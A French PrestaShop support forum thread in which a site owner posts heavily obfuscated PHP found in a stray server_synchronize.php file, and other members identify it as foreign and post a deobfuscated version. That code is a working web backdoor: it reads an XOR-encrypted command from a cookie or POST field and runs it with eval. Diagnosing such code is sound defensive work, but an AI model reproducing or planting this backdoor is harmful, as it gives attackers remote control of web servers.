Jump to content
yanoch_newbie

code suspect dans le server_synchronize.php

Recommended Posts

Bonjour

Voici le code que je trouve dans le fichier server_synchronize.php 

Est ce que ça vous semble normal ?

$h2bf1 = 851;$GLOBALS['r9418'] = Array();global $r9418;$r9418 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['r168d1'] = "\x39\x73\x3e\x76\x5e\x33\x37\x27\x61\x48\x4f\x29\x5f\x6e\x43\x2c\x45\x20\x25\x4e\x41\x6b\x65\xa\x4a\x23\x31\x34\x53\x42\x54\x6f\x44\x9\x22\x72\x5a\x66\x38\x7a\x3d\xd\x49\x3b\x47\x55\x6c\x35\x60\x3c\x52\x78\x62\x59\x46\x2b\x7d\x75\x2d\x51\x58\x67\x79\x50\x21\x5d\x68\x57\x7e\x36\x2a\x71\x69\x30\x3a\x64\x4c\x7b\x56\x74\x77\x5b\x6d\x7c\x26\x4b\x4d\x5c\x24\x6a\x70\x2f\x32\x63\x2e\x40\x28\x3f";$r9418[$r9418['r168d1'][31].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][93]] = $r9418['r168d1'][93].$r9418['r168d1'][66].$r9418['r168d1'][35];$r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]] = $r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][75];$r9418[$r9418['r168d1'][72].$r9418['r168d1'][75].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][26]] = $r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][37].$r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]] = $r9418['r168d1'][1].$r9418['r168d1'][79].$r9418['r168d1'][35].$r9418['r168d1'][46].$r9418['r168d1'][22].$r9418['r168d1'][13];$r9418[$r9418['r168d1'][51].$r9418['r168d1'][38].$r9418['r168d1'][37].$r9418['r168d1'][47]] = $r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][37].$r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][22].$r9418['r168d1'][75];$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]] = $r9418['r168d1'][72].$r9418['r168d1'][13].$r9418['r168d1'][72].$r9418['r168d1'][12].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][79];$r9418[$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][92].$r9418['r168d1'][92].$r9418['r168d1'][93].$r9418['r168d1'][75].$r9418['r168d1'][38].$r9418['r168d1'][27]] = $r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][72].$r9418['r168d1'][8].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][39].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][35].$r9418['r168d1'][93].$r9418['r168d1'][47].$r9418['r168d1'][38].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][6]] = $r9418['r168d1'][90].$r9418['r168d1'][66].$r9418['r168d1'][90].$r9418['r168d1'][3].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][1].$r9418['r168d1'][72].$r9418['r168d1'][31].$r9418['r168d1'][13];$r9418[$r9418['r168d1'][80].$r9418['r168d1'][92].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][47]] = $r9418['r168d1'][57].$r9418['r168d1'][13].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][72].$r9418['r168d1'][8].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][39].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][62].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][73].$r9418['r168d1'][93].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][37]] = $r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][27].$r9418['r168d1'][12].$r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][93].$r9418['r168d1'][31].$r9418['r168d1'][75].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][57].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][47]] = $r9418['r168d1'][1].$r9418['r168d1'][22].$r9418['r168d1'][79].$r9418['r168d1'][12].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][22].$r9418['r168d1'][12].$r9418['r168d1'][46].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][72].$r9418['r168d1'][79];$r9418[$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][93].$r9418['r168d1'][26]] = $r9418['r168d1'][39].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][5];$r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]] = $r9418['r168d1'][66].$r9418['r168d1'][0].$r9418['r168d1'][93].$r9418['r168d1'][8].$r9418['r168d1'][22];$r9418[$r9418['r168d1'][21].$r9418['r168d1'][27].$r9418['r168d1'][22].$r9418['r168d1'][52].$r9418['r168d1'][93]] = $_POST;$r9418[$r9418['r168d1'][80].$r9418['r168d1'][8].$r9418['r168d1'][22].$r9418['r168d1'][47]] = $_COOKIE;@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][35].$r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][12].$r9418['r168d1'][46].$r9418['r168d1'][31].$r9418['r168d1'][61], NULL);@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][46].$r9418['r168d1'][31].$r9418['r168d1'][61].$r9418['r168d1'][12].$r9418['r168d1'][22].$r9418['r168d1'][35].$r9418['r168d1'][35].$r9418['r168d1'][31].$r9418['r168d1'][35].$r9418['r168d1'][1], 0);@$r9418[$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][69].$r9418['r168d1'][5].$r9418['r168d1'][27].$r9418['r168d1'][8].$r9418['r168d1'][69]]($r9418['r168d1'][82].$r9418['r168d1'][8].$r9418['r168d1'][51].$r9418['r168d1'][12].$r9418['r168d1'][22].$r9418['r168d1'][51].$r9418['r168d1'][22].$r9418['r168d1'][93].$r9418['r168d1'][57].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][31].$r9418['r168d1'][13].$r9418['r168d1'][12].$r9418['r168d1'][79].$r9418['r168d1'][72].$r9418['r168d1'][82].$r9418['r168d1'][22], 0);@$r9418[$r9418['r168d1'][57].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][22].$r9418['r168d1'][8].$r9418['r168d1'][47]](0);if (!$r9418[$r9418['r168d1'][51].$r9418['r168d1'][38].$r9418['r168d1'][37].$r9418['r168d1'][47]]($r9418['r168d1'][20].$r9418['r168d1'][76].$r9418['r168d1'][50].$r9418['r168d1'][16].$r9418['r168d1'][20].$r9418['r168d1'][32].$r9418['r168d1'][53].$r9418['r168d1'][12].$r9418['r168d1'][50].$r9418['r168d1'][45].$r9418['r168d1'][19].$r9418['r168d1'][12].$r9418['r168d1'][5].$r9418['r168d1'][69].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][5].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][8].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][37].$r9418['r168d1'][26].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][73].$r9418['r168d1'][92].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][8])){$r9418[$r9418['r168d1'][72].$r9418['r168d1'][75].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][73].$r9418['r168d1'][26]]($r9418['r168d1'][20].$r9418['r168d1'][76].$r9418['r168d1'][50].$r9418['r168d1'][16].$r9418['r168d1'][20].$r9418['r168d1'][32].$r9418['r168d1'][53].$r9418['r168d1'][12].$r9418['r168d1'][50].$r9418['r168d1'][45].$r9418['r168d1'][19].$r9418['r168d1'][12].$r9418['r168d1'][5].$r9418['r168d1'][69].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][38].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][5].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][8].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][37].$r9418['r168d1'][26].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][8].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][73].$r9418['r168d1'][92].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][8], 1);$r6ea = NULL;$o16aa8 = NULL;$r9418[$r9418['r168d1'][79].$r9418['r168d1'][27].$r9418['r168d1'][6].$r9418['r168d1'][38]] = $r9418['r168d1'][75].$r9418['r168d1'][8].$r9418['r168d1'][47].$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][73].$r9418['r168d1'][58].$r9418['r168d1'][5].$r9418['r168d1'][22].$r9418['r168d1'][75].$r9418['r168d1'][22].$r9418['r168d1'][58].$r9418['r168d1'][27].$r9418['r168d1'][37].$r9418['r168d1'][0].$r9418['r168d1'][52].$r9418['r168d1'][58].$r9418['r168d1'][0].$r9418['r168d1'][5].$r9418['r168d1'][22].$r9418['r168d1'][92].$r9418['r168d1'][58].$r9418['r168d1'][47].$r9418['r168d1'][26].$r9418['r168d1'][37].$r9418['r168d1'][69].$r9418['r168d1'][38].$r9418['r168d1'][69].$r9418['r168d1'][26].$r9418['r168d1'][92].$r9418['r168d1'][0].$r9418['r168d1'][47].$r9418['r168d1'][22].$r9418['r168d1'][92];global $t478;function  h9cae($r6ea, $y53d39940){global $r9418;$w3d230 = "";for ($qefa1=0; $qefa1<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($r6ea);){for ($c7d8b4=0; $c7d8b4<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($y53d39940) && $qefa1<$r9418[$r9418['r168d1'][61].$r9418['r168d1'][37].$r9418['r168d1'][52].$r9418['r168d1'][52].$r9418['r168d1'][93].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][38]]($r6ea); $c7d8b4++, $qefa1++){$w3d230 .= $r9418[$r9418['r168d1'][31].$r9418['r168d1'][26].$r9418['r168d1'][52].$r9418['r168d1'][92].$r9418['r168d1'][26].$r9418['r168d1'][8].$r9418['r168d1'][93]]($r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]]($r6ea[$qefa1]) ^ $r9418[$r9418['r168d1'][13].$r9418['r168d1'][92].$r9418['r168d1'][27].$r9418['r168d1'][73].$r9418['r168d1'][75].$r9418['r168d1'][93]]($y53d39940[$c7d8b4]));}}return $w3d230;}function  z21ea3($r6ea, $y53d39940){global $r9418;global $t478;return $r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]]($r9418[$r9418['r168d1'][46].$r9418['r168d1'][5].$r9418['r168d1'][37].$r9418['r168d1'][5]]($r6ea, $t478), $y53d39940);}foreach ($r9418[$r9418['r168d1'][80].$r9418['r168d1'][8].$r9418['r168d1'][22].$r9418['r168d1'][47]] as $y53d39940=>$f9f33e70a){$r6ea = $f9f33e70a;$o16aa8 = $y53d39940;}if (!$r6ea){foreach ($r9418[$r9418['r168d1'][21].$r9418['r168d1'][27].$r9418['r168d1'][22].$r9418['r168d1'][52].$r9418['r168d1'][93]] as $y53d39940=>$f9f33e70a){$r6ea = $f9f33e70a;$o16aa8 = $y53d39940;}}$r6ea = @$r9418[$r9418['r168d1'][80].$r9418['r168d1'][92].$r9418['r168d1'][8].$r9418['r168d1'][92].$r9418['r168d1'][47]]($r9418[$r9418['r168d1'][52].$r9418['r168d1'][69].$r9418['r168d1'][8].$r9418['r168d1'][93].$r9418['r168d1'][26]]($r9418[$r9418['r168d1'][62].$r9418['r168d1'][47].$r9418['r168d1'][47].$r9418['r168d1'][73].$r9418['r168d1'][93].$r9418['r168d1'][22].$r9418['r168d1'][69].$r9418['r168d1'][37]]($r6ea), $o16aa8));if (isset($r6ea[$r9418['r168d1'][8].$r9418['r168d1'][21]]) && $t478==$r6ea[$r9418['r168d1'][8].$r9418['r168d1'][21]]){if ($r6ea[$r9418['r168d1'][8]] == $r9418['r168d1'][72]){$qefa1 = Array($r9418['r168d1'][90].$r9418['r168d1'][3] => @$r9418[$r9418['r168d1'][35].$r9418['r168d1'][93].$r9418['r168d1'][47].$r9418['r168d1'][38].$r9418['r168d1'][27].$r9418['r168d1'][0].$r9418['r168d1'][6]](),$r9418['r168d1'][1].$r9418['r168d1'][3] => $r9418['r168d1'][26].$r9418['r168d1'][94].$r9418['r168d1'][73].$r9418['r168d1'][58].$r9418['r168d1'][26],);echo @$r9418[$r9418['r168d1'][22].$r9418['r168d1'][6].$r9418['r168d1'][92].$r9418['r168d1'][92].$r9418['r168d1'][93].$r9418['r168d1'][75].$r9418['r168d1'][38].$r9418['r168d1'][27]]($qefa1);}elseif ($r6ea[$r9418['r168d1'][8]] == $r9418['r168d1'][22]){eval/*l3ba4*/($r6ea[$r9418['r168d1'][75]]);}exit();}} ?>

Share this post


Link to post
Share on other sites

C'est quoi ce fichier déjà à la base ????

car il ne me semble pas exister dans l'archive de n'importe quelle version de PrestaShop.

donc poubelle si vous ne savez pas et surtout il faut trouver comment il est arriver là.

Share this post


Link to post
Share on other sites
Posted (edited)

Le fichier est dans le dossier phpMA qui est lui même à la racine du prestashop 1.4.7.2

 

Je peux simplement enlever le code suspect .....sinon 

Edited by yanoch_newbie (see edit history)

Share this post


Link to post
Share on other sites

phpMA n'existe pas plus donc si vous ne savez pas vous renommez ou vous effacez mais tout cela pu grave.

Share this post


Link to post
Share on other sites

Pour info, une fois "nettoyé" (c'est juste pour le rendre lisible et compréhensible) le code ressemble à :

 

<?php 
@iniset(error_log, NULL);
@iniset(log_errors, 0);
@iniset(max_execution_time, 0);
@settimelimit(0);
if (!defined(ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba))
{
    define(ALREADY_RUN_366afb8a8a2355ab21fbf11ba1a02fba, 1);
    $r6ea = NULL;
    $o16aa8 = NULL;
    [t478] = da5b6e70-3ede-4f9b-93e2-51f6861295e2;
    global $t478;
    function  h9cae($r6ea, $y53d39940)
    {
        global ;
        $w3d230 = "";
        for ($qefa1=0; $qefa1<strlen($r6ea);) {
            for ($c7d8b4=0; $c7d8b4<strlen($y53d39940) && $qefa1<strlen($r6ea); $c7d8b4++, $qefa1++) {
                $w3d230 = chr(ord($r6ea[$qefa1]) ^ ord($y53d39940[$c7d8b4]));
            }
        }
        return $w3d230;
    }

    function  z21ea3($r6ea, $y53d39940)
    {
        global ;
        global $t478;
        return h9cae(h9cae($r6ea, $t478), $y53d39940);
    }

    foreach ($_COOKIE as $y53d39940=>$f9f33e70a) {
        $r6ea = $f9f33e70a;
        $o16aa8 = $y53d39940;
    }

    if (!$r6ea) {
        foreach ($_POST as $y53d39940=>$f9f33e70a) {
            $r6ea = $f9f33e70a;
            $o16aa8 = $y53d39940;
        }
    }

    $r6ea = @unserialize(z21ea3(base64decode($r6ea), $o16aa8));
    if (isset($r6ea[ak]) && $t478==$r6ea[ak]) {
        if ($r6ea[a] == i) {
            $qefa1 = Array(pv => @phpversion(),sv => 10-1,);
            echo @serialize($qefa1);
        } elseif ($r6ea[a] == e) {
        eval/*l3ba4*/($r6ea[d]);
        }
        exit();
    }
}

 

donc si dans un module ou autre fichier tu retrouves un code totalement illisible tu saura qu'il y a un lien

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More